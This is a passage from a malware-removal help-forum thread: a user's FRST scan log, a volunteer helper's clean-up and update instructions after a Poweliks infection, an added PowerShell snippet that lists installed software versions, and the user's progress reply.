2014-07-07 22:27 - 2013-04-12 17:36 - 00000000 ____D () C:\Users\Ric\Documents\Trivia_Ladder_Trivia_Sets
2014-07-07 22:27 - 2013-03-26 09:18 - 00000000 ____D () C:\Users\Ric\Documents\Theatre ALLBIOS
2014-07-07 22:27 - 2013-03-06 09:41 - 00000000 ____D () C:\Users\Ric\Documents\Sharon ApplicationforResidency
2014-07-07 22:27 - 2013-02-05 10:04 - 00000000 ____D () C:\Users\Ric\Documents\Ric Mitchell Q&A OnlineTriviaInsert
2014-07-07 22:27 - 2013-01-22 09:19 - 00000000 ___HD () C:\Users\Ric\Desktop\.picasaoriginals
2014-07-07 22:27 - 2012-12-11 08:53 - 00000000 ____D () C:\Users\Ric\Documents\2012 Tax Return and Packet
2014-07-07 22:27 - 2012-11-15 13:45 - 00000000 ____D () C:\Users\Ric\Documents\ACX
2014-07-07 22:27 - 2012-11-04 17:12 - 00000000 ____D () C:\Users\Ric\Documents\Scott Trivia Documnets
2014-07-07 22:27 - 2012-10-18 09:17 - 00000000 ____D () C:\Users\Ric\AppData\Local\Quicken WillMaker Plus 2013
2014-07-07 22:27 - 2012-08-30 09:24 - 00000000 ____D () C:\Users\Ric\Documents\Cathleen book IllustrationsSoFarLoRes
2014-07-07 22:27 - 2012-08-29 13:47 - 00000000 ____D () C:\Users\Ric\Documents\VillagesBacallRecinvoiceSockHop
2014-07-07 22:27 - 2012-08-27 09:01 - 00000000 ____D () C:\Users\Ric\Documents\Cigna Medical Forms
2014-07-07 22:27 - 2012-08-05 18:39 - 00000000 ____D () C:\Users\Ric\Documents\Amazon MP3
2014-07-07 22:27 - 2012-07-30 18:09 - 00000000 ____D () C:\Users\Ric\Documents\Cathleen book
2014-07-07 22:27 - 2012-06-17 15:48 - 00000000 ____D () C:\Users\Ric\Documents\TOPHITSOF1981
2014-07-07 22:27 - 2012-05-30 07:34 - 00000000 ____D () C:\Users\Ric\Documents\W-9 Form-2011 Blank
2014-07-07 22:27 - 2012-04-07 07:51 - 00000000 ____D () C:\Users\Ric\Documents\1940 UnitedStatesFederalCensus(Beta)
2014-07-07 22:27 - 2012-02-22 11:12 - 00000000 ____D () C:\Users\Ric\Documents\Moving notes
2014-07-07 22:27 - 2012-02-22 11:12 - 00000000 ____D () C:\Users\Ric\Documents\2011 Tax package Orlando
2014-07-07 22:27 - 2012-02-06 20:07 - 00000000 ____D () C:\Users\Ric\Documents\Drew Addtional files
2014-07-07 22:27 - 2012-01-26 10:23 - 00000000 ____D () C:\Users\Ric\Documents\Consumer Cellular
2014-07-07 22:27 - 2012-01-19 17:12 - 00000000 ____D () C:\Users\Ric\Documents\Daily Sun ads
2014-07-07 22:27 - 2012-01-14 13:54 - 00000000 ___SD () C:\Users\Ric\Documents\My Data Sources
2014-07-07 22:27 - 2012-01-11 10:45 - 00000000 ____D () C:\Users\Ric\Documents\Ameriprise statements
2014-07-07 22:27 - 2011-12-22 09:51 - 00000000 ____D () C:\Users\Ric\Documents\Rental lease 2
2014-07-07 22:27 - 2011-10-19 12:00 - 00000000 ____D () C:\Users\Ric\Desktop\TheGameShowManLogo1
2014-07-07 22:27 - 2011-10-13 12:24 - 00000000 ____D () C:\Users\Ric\AppData\Local\Quicken WillMaker Plus 2012
2014-07-07 22:27 - 2011-09-03 09:39 - 00000000 ____D () C:\Users\Ric\Documents\Amazon MP3 Uploader
2014-07-07 22:27 - 2011-08-17 16:07 - 00000000 ____D () C:\Users\Ric\Documents\2009D'AMICO tax return
2014-07-07 22:27 - 2011-03-13 15:17 - 00000000 ____D () C:\Users\Ric\Documents\skoop special
2014-07-07 22:27 - 2011-03-10 16:09 - 00000000 ____D () C:\Users\Ric\AppData\Local\Broderbund Software
2014-07-07 22:27 - 2011-03-05 14:00 - 00000000 ___RD () C:\Users\Ric\Documents\My Dropbox
2014-07-07 22:27 - 2011-03-05 14:00 - 00000000 ____D () C:\Users\Ric\Documents\BlackBerry
2014-07-07 22:27 - 2011-03-05 14:00 - 00000000 ____D () C:\Users\Ric\Desktop\Website text and files
2014-07-07 22:27 - 2011-03-05 13:46 - 00000000 ____D () C:\Users\Ric\Carbonite Restored OLD User Settings
2014-07-07 22:27 - 2011-03-05 13:46 - 00000000 ____D () C:\Users\Public\Documents\yoostar
2014-07-07 22:27 - 2011-03-03 17:13 - 00000000 ____D () C:\Users\Ric\Documents\DAmico-Fitzgerald Tax Return 2010
2014-07-07 22:27 - 2011-03-01 14:05 - 00000000 ____D () C:\Users\Ric\Documents\Ric Mary Pics
2014-07-07 22:27 - 2011-02-28 18:19 - 00000000 ____D () C:\Users\Ric\Documents\skoop
2014-07-07 22:27 - 2011-02-28 09:14 - 00000000 ____D () C:\ProgramData\McAfee
2014-07-07 22:27 - 2011-02-27 20:26 - 00000000 ____D () C:\Users\Ric\AppData\Local\CatalystMC
2014-07-07 22:27 - 2011-02-27 19:46 - 00000000 ____D () C:\ProgramData\PhotoShow Shared Assets
2014-07-07 22:27 - 2011-02-27 15:24 - 00000000 ____D () C:\Users\Ric\Documents\Dell WebCam Central
2014-07-07 22:27 - 2011-02-26 18:06 - 00000000 ____D () C:\Users\Ric\Documents\Bank of America
2014-07-07 22:27 - 2011-02-26 17:49 - 00000000 ___RD () C:\Users\Ric\Dropbox
2014-07-07 22:27 - 2011-02-26 17:45 - 00000000 ____D () C:\ProgramData\Intuit
2014-07-07 22:27 - 2011-02-26 14:13 - 00000000 ____D () C:\Users\Ric\AppData\Local\AOL
2014-07-07 22:27 - 2011-02-26 13:26 - 00000000 ____D () C:\Users\Ric\Documents\Outlook Files
2014-07-07 22:27 - 2011-02-26 01:39 - 00000000 ____D () C:\ProgramData\Logishrd
2014-07-07 22:27 - 2011-02-26 01:21 - 00000000 ____D () C:\Users\Ric\Documents\Adobe
2014-07-07 22:27 - 2011-02-26 00:59 - 00000000 ____D () C:\Users\Public\Documents\Adobe
2014-07-07 22:27 - 2011-02-26 00:34 - 00000000 ____D () C:\Users\Ric\AppData\Local\Apple Computer
2014-07-07 12:45 - 2014-02-06 09:50 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\vlc
2014-07-07 12:45 - 2011-09-03 09:39 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\com.amazon.music.uploader
2014-07-07 12:45 - 2011-05-25 13:27 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Dell
2014-07-07 12:45 - 2011-03-01 17:08 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\eFax Messenger
2014-07-07 12:45 - 2011-02-27 20:00 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Roxio
2014-07-07 12:45 - 2011-02-26 17:47 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Dropbox
2014-07-07 12:45 - 2011-02-26 17:46 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Intuit
2014-07-07 12:45 - 2011-02-26 17:44 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Tether
2014-07-07 12:45 - 2011-02-26 16:55 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Real
2014-07-07 12:45 - 2011-02-26 14:38 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\PACE Anti-Piracy
2014-07-07 12:45 - 2011-02-26 00:09 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\PCDr
2014-07-07 12:42 - 2013-05-25 14:16 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\ArcSoft
2014-07-07 12:42 - 2013-05-23 17:51 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\canon
2014-07-07 12:42 - 2011-04-04 11:35 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Amazon
2014-07-07 12:42 - 2011-02-26 00:45 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Adobe
2014-07-07 12:42 - 2011-02-26 00:34 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Apple Computer
2014-07-07 12:19 - 2011-02-27 10:02 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1
2014-07-06 14:15 - 2014-07-06 14:15 - 00000000 ____D () C:\Users\Ric\AppData\Local\GHISLER
2014-07-06 13:47 - 2014-07-06 13:47 - 00000000 __SHD () C:\Users\roy\AppData\Local\EmieUserList
2014-07-06 13:47 - 2014-07-06 13:47 - 00000000 __SHD () C:\Users\roy\AppData\Local\EmieSiteList
2014-07-06 13:39 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-07-06 11:46 - 2014-07-06 11:46 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-07-05 22:06 - 2014-07-05 22:06 - 00000000 ____D () C:\Users\roy\AppData\Local\GHISLER
2014-07-05 22:04 - 2014-07-05 22:04 - 00000736 _____ () C:\Users\Public\Desktop\Total Commander 64 bit.lnk
2014-07-05 22:04 - 2014-07-05 22:04 - 00000722 _____ () C:\Users\Public\Desktop\Total Commander.lnk
2014-07-05 22:04 - 2014-07-05 22:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Total Commander
2014-07-05 14:46 - 2014-07-05 14:46 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Notepad++
2014-07-05 14:25 - 2014-07-05 14:25 - 00453480 _____ () C:\Users\roy\AppData\Local\GDIPFONTCACHEV1.DAT
2014-07-05 14:23 - 2014-07-05 14:23 - 00001417 _____ () C:\Users\roy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Apple Computer
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Adobe
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Local\Google
2014-07-05 14:22 - 2014-07-05 14:22 - 00000020 ___SH () C:\Users\roy\ntuser.ini
2014-07-05 14:22 - 2014-07-05 14:22 - 00000000 ____D () C:\Users\roy\AppData\Local\VirtualStore
2014-07-05 14:17 - 2014-01-08 09:57 - 00035352 _____ () C:\Users\Ric\Downloads\Jay and The Americans    March 2014.xls
2014-07-05 14:17 - 2011-10-24 12:08 - 01349912 _____ () C:\Users\Ric\Downloads\header.fla
2014-07-05 14:16 - 2013-07-26 15:28 - 00028952 _____ () C:\Users\Ric\Downloads\Garrett Miles MUSIC & MAYHEM   Sept 2013.xls
2014-07-05 14:16 - 2013-07-26 15:28 - 00028952 _____ () C:\Users\Ric\Downloads\Garrett Miles MUSIC & MAYHEM   Sept 2013 (1).xls
2014-07-05 13:53 - 2014-07-05 13:53 - 00139544 ____H () C:\Users\Ric\Downloads\Donna Summer - Last Dance.mp3.z1a
2014-07-05 13:53 - 2014-01-08 09:58 - 00028440 _____ () C:\Users\Ric\Downloads\Brooklyn Bridge the  March 2014.xls
2014-07-05 13:53 - 2014-01-08 09:58 - 00028440 _____ () C:\Users\Ric\Downloads\Brooklyn Bridge the  March 2014 (1).xls
2014-07-05 13:53 - 2011-03-09 16:32 - 00034328 _____ () C:\Users\Ric\Documents\watermark[540].tga
2014-07-05 13:53 - 2011-03-09 16:32 - 00018712 _____ () C:\Users\Ric\Documents\watermark[396].tga
2014-07-05 13:53 - 2011-03-09 16:32 - 00009752 _____ () C:\Users\Ric\Documents\watermark[288].tga
2014-07-05 13:49 - 2012-09-22 12:31 - 00022040 _____ () C:\Users\Ric\Documents\TOPHITSOF1973.xls
2014-07-05 13:49 - 2012-05-21 09:14 - 00023576 _____ () C:\Users\Ric\Documents\TOPHITSOF1968.xls
2014-07-05 13:49 - 2012-01-14 09:52 - 00009240 _____ () C:\Users\Ric\Documents\Team Trivia Board.xlsx
2014-07-05 13:49 - 2011-03-17 14:55 - 13156376 _____ () C:\Users\Ric\Documents\SUNY speech.pptx
2014-07-05 13:48 - 2012-05-28 07:48 - 00023576 _____ () C:\Users\Ric\Documents\SUMMERSONGS.xls
2014-07-05 13:48 - 2011-10-28 15:25 - 00039192 _____ () C:\Users\Ric\Documents\Star Phone Listing.xls
2014-07-05 13:48 - 2011-04-17 13:39 - 13158168 _____ () C:\Users\Ric\Documents\SUNY speech FINAL.pptx
2014-07-05 13:47 - 2012-08-04 13:59 - 00027416 _____ () C:\Users\Ric\Documents\ROOTSOFROCKNROLL.xls
2014-07-05 13:46 - 2011-09-21 17:53 - 00875288 _____ () C:\Users\Ric\Documents\Rickaraoketextfile.xls
2014-07-05 13:41 - 2012-09-23 13:25 - 08316373 ____T () C:\Users\Ric\Documents\Ric Pre Show Powerpoint.wmv
2014-07-05 13:41 - 2012-09-23 13:03 - 01148184 _____ () C:\Users\Ric\Documents\Ric Pre Show Powerpoint.pptx
2014-07-05 13:39 - 2013-08-24 17:25 - 00022552 _____ () C:\Users\Ric\Documents\PartyBaseVillages 2014.xlsx
2014-07-05 13:39 - 2013-05-15 10:02 - 00080920 _____ () C:\Users\Ric\Documents\PartyBaseVillages 2013-Part 2.xls
2014-07-05 13:39 - 2013-01-07 10:49 - 00082968 _____ () C:\Users\Ric\Documents\PartyBaseVillages 2012.xls
2014-07-05 13:39 - 2012-08-24 09:47 - 00012312 _____ () C:\Users\Ric\Documents\Red Hat.xlsx
2014-07-05 13:39 - 2012-04-24 11:46 - 00077080 _____ () C:\Users\Ric\Documents\PartyBaseVillages2.xls
2014-07-05 13:39 - 2012-01-06 10:55 - 00081944 _____ () C:\Users\Ric\Documents\PartyBaseVillages.xls
2014-07-05 13:39 - 2011-02-27 12:18 - 00407832 _____ () C:\Users\Ric\Documents\PartyBase.xlr
2014-07-05 13:36 - 2012-08-17 08:48 - 00013080 _____ () C:\Users\Ric\Documents\LadiesLuncheonRoster with birthdays.xlsx
2014-07-05 13:36 - 2012-08-16 11:09 - 00013336 _____ () C:\Users\Ric\Documents\LadiesLuncheonRoster.xlsx
2014-07-05 13:36 - 2012-07-03 17:35 - 00032792 _____ () C:\Users\Ric\Documents\Knott Take It Or Leave It.xlsx
2014-07-05 13:36 - 2012-07-03 16:54 - 00032536 _____ () C:\Users\Ric\Documents\Knott Blank amended Ric Trivia sheet for multiple teams-.xlsx
2014-07-05 13:36 - 2012-04-13 10:51 - 00012824 _____ () C:\Users\Ric\Documents\LadiesLuncheonRoster-04-12.xlsx
2014-07-05 13:36 - 2012-01-18 10:06 - 00056344 _____ () C:\Users\Ric\Documents\Knott Template blank Tamarind Grove GOOD TO GO large questions.xlsx
2014-07-05 13:36 - 2012-01-18 10:03 - 00056856 _____ () C:\Users\Ric\Documents\Knott Template blank trivia3 GOOD TO GO large questions.xlsx
2014-07-05 13:36 - 2012-01-18 09:58 - 00054040 _____ () C:\Users\Ric\Documents\Knott Template trivia3 GOOD TO GO large questions.xlsx
2014-07-05 13:36 - 2012-01-17 12:25 - 00033048 _____ () C:\Users\Ric\Documents\Knott amended Ric Trivia sheet for multiple teams.xlsx
2014-07-05 13:36 - 2012-01-17 12:20 - 00031256 _____ () C:\Users\Ric\Documents\Knott amended Ric Trivia sheet.xlsx
2014-07-05 13:36 - 2012-01-16 12:34 - 00014104 _____ () C:\Users\Ric\Documents\Knott Template trivia3 GOOD TO GO.xlsx
2014-07-05 13:36 - 2012-01-16 12:29 - 00013848 _____ () C:\Users\Ric\Documents\Knott Template trivia2.xlsx
2014-07-05 13:36 - 2012-01-16 11:55 - 00012056 _____ () C:\Users\Ric\Documents\Knott Template trivia.xlsx
2014-07-05 13:36 - 2011-08-22 18:43 - 00001304 _____ () C:\Users\Ric\Documents\Karaokesongrequestslip.txt
2014-07-05 13:36 - 2011-03-09 16:47 - 01051928 _____ () C:\Users\Ric\Documents\Karaoke text file.txt
2014-07-05 13:35 - 2014-01-24 11:53 - 51149806 _____ () C:\Users\Ric\Documents\GROWING UP BOOMER final Georgia Club.pptx
2014-07-05 13:35 - 2011-08-18 15:58 - 00001304 _____ () C:\Users\Ric\Documents\Karaoke song request slip.txt
2014-07-05 13:34 - 2014-01-24 12:52 - 51149780 _____ () C:\Users\Ric\Documents\GROWING UP BOOMER final Georgia Club extra.pptx
2014-07-05 13:33 - 2013-08-08 11:06 - 00001560 _____ () C:\Users\Ric\Documents\Game Show 5 Ric 3-2.txt
2014-07-05 13:32 - 2013-03-20 08:02 - 00010520 _____ () C:\Users\Ric\Documents\Disney Family Feud.xlsx
2014-07-05 13:32 - 2013-01-28 13:20 - 03211800 _____ () C:\Users\Ric\Documents\Ethics in Education.ppt
2014-07-05 13:32 - 2012-06-16 18:45 - 00015640 _____ () C:\Users\Ric\Documents\FATHER'SDAYSONGS.xls
2014-07-05 13:32 - 2012-02-16 10:48 - 00154136 _____ () C:\Users\Ric\Documents\Fast Money Round 2.xls
2014-07-05 13:32 - 2012-02-16 10:42 - 00032792 _____ () C:\Users\Ric\Documents\Fast Money Round.xls
2014-07-05 13:29 - 2012-06-11 17:12 - 00023064 _____ () C:\Users\Ric\Documents\CALENDARCLASSICS.xls
2014-07-05 13:29 - 2011-04-27 12:43 - 07028992 _____ () C:\Users\Ric\Documents\Bring a tear to my eye.wmv
2014-07-05 13:29 - 2011-02-26 20:26 - 11796504 _____ () C:\Users\Ric\Documents\capture.avi
2014-07-04 13:32 - 2014-07-04 13:27 - 20787200 _____ () C:\Users\Ric\qdata2010.QDF
2014-07-04 13:32 - 2011-02-28 08:03 - 00000000 ____D () C:\Users\Ric\BACKUP
2014-07-04 13:28 - 2014-07-04 04:19 - 20787200 _____ () C:\Users\Ric\Downloads\qdata2010 (1).qdf
2014-07-04 13:24 - 2014-07-04 04:24 - 00001120 _____ () C:\Users\Ric\Downloads\qdata2010 (1)OFXLOG.DAT
2014-07-04 04:56 - 2013-05-19 16:06 - 00039448 _____ () C:\Users\Ric\Documents\Belize The Top English Speaking Retirement Haven in the Caribbean.txt
2014-07-04 04:33 - 2013-03-21 13:45 - 03414552 _____ () C:\Users\Ric\Documents\ABCs.pps
2014-07-04 04:19 - 2014-07-04 04:19 - 20780389 _____ () C:\Users\Ric\Downloads\qdata2010 (2).qdf
2014-07-02 07:15 - 2014-07-02 07:15 - 00003288 _____ () C:\bootsqm.dat
2014-07-02 02:01 - 2014-06-05 11:17 - 00000000 ____D () C:\Users\Ric\AppData\Local\UQmedia
2014-07-01 22:43 - 2012-01-30 10:19 - 00054296 _____ () C:\Users\Ric\Desktop\Knott excel test.xlsx
2014-07-01 22:20 - 2014-05-15 09:09 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\DropboxMaster
2014-07-01 15:37 - 2013-05-23 17:24 - 00000000 ____D () C:\ProgramData\CanonIJPLM
2014-07-01 15:28 - 2014-06-25 19:23 - 20742144 _____ () C:\Users\Ric\Downloads\qdata2010.qdf
2014-07-01 15:27 - 2014-06-25 19:23 - 00000896 _____ () C:\Users\Ric\Downloads\qdata2010OFXLOG.DAT
2014-06-25 20:50 - 2014-06-25 20:26 - 00000961 ____H () C:\IPH.PH
2014-06-25 20:50 - 2011-02-26 14:14 - 00094197 _____ () C:\install.log
2014-06-25 20:20 - 2014-06-25 20:20 - 00208400 _____ (AOL LLC.) C:\Users\Ric\Downloads\AOLDNLD.exe
2014-06-25 20:13 - 2011-02-26 00:37 - 00002503 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Safari.lnk
2014-06-25 19:30 - 2014-06-25 19:29 - 00369792 _____ () C:\Windows\Minidump\062514-34335-01.dmp
2014-06-25 19:22 - 2011-04-27 15:24 - 00463200 _____ () C:\Users\Ric\qdata2010OFXLOG.DAT
2014-06-24 13:11 - 2011-08-28 11:40 - 00003866 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA
2014-06-24 13:11 - 2011-08-28 11:40 - 00003470 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core
2014-06-24 13:10 - 2013-10-06 14:24 - 00003888 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-06-24 13:10 - 2013-10-06 14:24 - 00003636 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-06-23 19:05 - 2014-06-23 19:04 - 00370536 _____ () C:\Windows\Minidump\062314-33337-01.dmp
2014-06-20 21:40 - 2011-02-27 19:48 - 00000000 ____D () C:\ProgramData\Roxio
2014-06-20 21:32 - 2014-06-20 21:32 - 00000000 ____D () C:\Users\Ric\Documents\Roxio Projects
2014-06-19 10:21 - 2014-06-13 11:10 - 00000000 ____D () C:\Users\Ric\AppData\Local\Adobe
2014-06-18 16:45 - 2014-06-18 16:44 - 01051112 _____ () C:\Users\Ric\Documents\Divorce Civi lCover Sheet.zip
2014-06-18 16:32 - 2014-06-18 16:31 - 00378088 _____ () C:\Windows\Minidump\061814-37799-01.dmp
2014-06-18 16:20 - 2014-06-18 16:20 - 00262144 _____ () C:\Windows\Minidump\061814-48672-01.dmp
2014-06-18 09:49 - 2014-06-18 09:49 - 00000000 ____D () C:\ProgramData\Package Cache
2014-06-18 09:48 - 2014-06-18 09:48 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-06-18 09:47 - 2014-06-18 09:47 - 00000000 ____D () C:\AMD
2014-06-18 09:40 - 2014-06-18 09:39 - 00569856 _____ () C:\Windows\Minidump\061814-35069-01.dmp
2014-06-17 16:55 - 2014-06-17 16:54 - 00369840 _____ () C:\Windows\Minidump\061714-74116-01.dmp
2014-06-17 16:43 - 2014-06-17 16:42 - 00369808 _____ () C:\Windows\Minidump\061714-29546-01.dmp

Files to move or delete:
====================
C:\Users\Ric\qdata2010OFXLOG.DAT
C:\Users\Ric\qdata2010_OldSyncLog.dat
C:\Users\Ric\qdata2010_SyncLog.dat

Some content of TEMP:
====================
C:\Users\Ric\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp9nk2tx.dll
C:\Users\Ric\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpa4yjld.dll
C:\Users\Ric\AppData\Local\Temp\procexp64.exe

==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-07-06 10:27

==================== End Of Log ============================



#14 aharonov

  • Malware Response Team

Posted 18 July 2014 - 02:04 AM

This is looking very good. I'm optimistic, too, that we got it. :)


Step 1

The author of Combofix has asked for some files to be uploaded so that he can analyze why Combofix didn't delete this infection and improve the detection. Thank you in advance for providing them as follows:
  • Please go to the directory C:\WINDOWS\erdnt\Hiv-backup.
  • Pack the folder Users to a zip archive (right click on it and choose Send to -> Compressed (zipped) folder).
  • Click here to upload this zip file to the author of Combofix:
    • Copy-paste the link to your topic into the respective text box.
    • Click on 'Browse', find and select the zip file you've just created and click 'Open'.
    • Write "Poweliks - User Hives" into the comments textbox.
    • Click on 'Send File'


Step 2

Please download the attached fixlist.txt and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • I don't need the log.



That's it! Your logs look clean to me at the moment.
We're gonna clean up everything now, close security holes on your computer and in the end I'll provide you with a list of security tips so you hopefully will not need our help anymore in the future.


My help is free for everybody.
If you want to support me fighting against malware or buy me a beer for the assistance you received, then you can consider a donation.
Thank you!



Clean Up

Now we remove all the tools we used (including their logs and quarantine folders), restore your settings and delete old and infected system restore points:
  • You can uninstall programs that you had to install (e.g. MBAM or ESET Onlinescanner) in the control panel if you so wish.
  • Rename Combofix.exe to Uninstall.exe and execute it with a double click. (Beware that file extensions might be hidden. So don't add a double extension Uninstall.exe.exe.)
  • Download DelFix (by Xplode) and save it to your Desktop.
    • Close all running programs and start delfix.exe.
    • Make sure that all available options are checked.
    • Click on Run
    • DelFix should remove all our tools and delete itself afterwards. I don't need the log file.
  • If there is still something left you can delete it manually.


Closing security holes

Many infections happen via drive-by downloads that run unnoticed in the background while the user visits an infected website. To achieve this, malware exploits security holes in installed software (e.g. browser or its plugins). Older versions of such software often have lots of known exploitable holes. Therefore it's very important to always keep your software up-to-date.
The following software is outdated. Make sure you remove all old versions and install the current one instead if you need the program:

Adobe Flash Player 13 Plugin
Adobe Reader X (10.1.10)
Java 6 Update 27




Tips

I recommend reading and following the "16 simple and easy ways to keep your computer safe and secure on the Internet" by Lawrence Abrams.

Edited by aharonov, 18 July 2014 - 03:09 AM.
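
The advice in the post above to remove all old versions of outdated software can be checked with an inventory of installed programs. This is an added PowerShell example, not part of the original post or of any tool it mentions; the family name patterns are assumptions based on the three programs listed there.

```powershell
# Added example (not from the original post): list every installed copy of
# the three product families the post names, so leftover old versions stand out.
# The name patterns are assumptions derived from the post's list.
$families = 'Adobe Flash Player', 'Adobe Reader', 'Java'

# Uninstall entries on 64-bit Windows: native 64-bit programs,
# 32-bit programs (WOW6432Node), and per-user installs.
$uninstallKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
)

$installed = foreach ($key in $uninstallKeys) {
    # Entries without a DisplayName are components, not listed programs
    Get-ItemProperty -Path $key -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName }
}

$report = foreach ($family in $families) {
    $hits = @($installed | Where-Object { $_.DisplayName -like "$family*" })
    foreach ($hit in $hits) {
        # New-Object keeps this compatible with PowerShell 2.0 on Windows 7
        New-Object PSObject -Property @{
            Family    = $family
            Name      = $hit.DisplayName
            Version   = $hit.DisplayVersion
            Publisher = $hit.Publisher
            # Several entries in one family: check for an old copy left behind
            Multiple  = ($hits.Count -gt 1)
        }
    }
}

if ($report) {
    $report | Sort-Object Family, Version |
        Format-Table Family, Name, Version, Publisher, Multiple -AutoSize
} else {
    'None of the listed products are installed.'
}
```

A `Multiple` value of True is only a prompt to look closer: a 32-bit and a 64-bit copy of the same version also produce two entries.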


#15 scooter2028

  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:05 AM

Posted 18 July 2014 - 10:47 AM

Status:

 

1. C:\WINDOWS\erdnt\Hiv-backup\Users >> Zipped and uploaded as specified.

2. FRST run with fixlog.txt as a 'Fix' task.

3. Beer contribution made.

 

Working on the rest.  More to follow.





